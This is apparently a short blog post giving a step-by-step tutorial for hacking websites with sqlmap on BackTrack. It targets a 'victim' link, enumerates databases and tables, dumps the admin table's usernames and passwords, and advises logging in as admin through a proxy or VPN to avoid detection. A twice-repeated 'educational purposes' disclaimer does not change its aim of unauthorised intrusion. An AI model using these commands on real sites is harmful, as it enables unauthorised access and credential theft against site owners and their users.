By using backtrack you can easily hack any web site
1. Open your backtrack terminal and type cd /pentest/database/sqlmap and click enter. Now sqlmap is open in your terminal2. Now find the vulnerable site.
3. Now type this command in the terminal and hit enter.(See the above image)
python sqlmap.py -u http://yourvictim'slink/index.php?id=4 –dbs4. Now you will get the database name of the website
Well I got the two database aj and information_schema we will select aj database.
5. Now get the tables of that database. for that you need to enter this command into your terminal and simply Click Enter.
python sqlmap.py -u http://yourvictim'slink/index.php?id=4 -D (database name) –tables
python sqlmap.py -u http://www.yourvictim'slink.com/index.php?id=4 -D aj –tables
7. Now you will get the tables list which is stored in aj database.
8. Now lets grab the columns from the admin table
python sqlmap.py -u http://www.yourvictim'slink.com/index.php?id=4 -T admin --columns
Now we got the columns and we got username and password
9. Now lets grab the passwords of the admin
python sqlmap.py -u http://www.yourvictim'slink.com/index.php?id=4 -T admin -U test --dump
Now we got the username and the password of the website
Now just find the admin penal of the website and use proxy/vpn when you are trying to login in the website as a admin.
NOTE:- This is only for educational purposes
NOTE:- This is only for educational purposes
No comments:
Post a Comment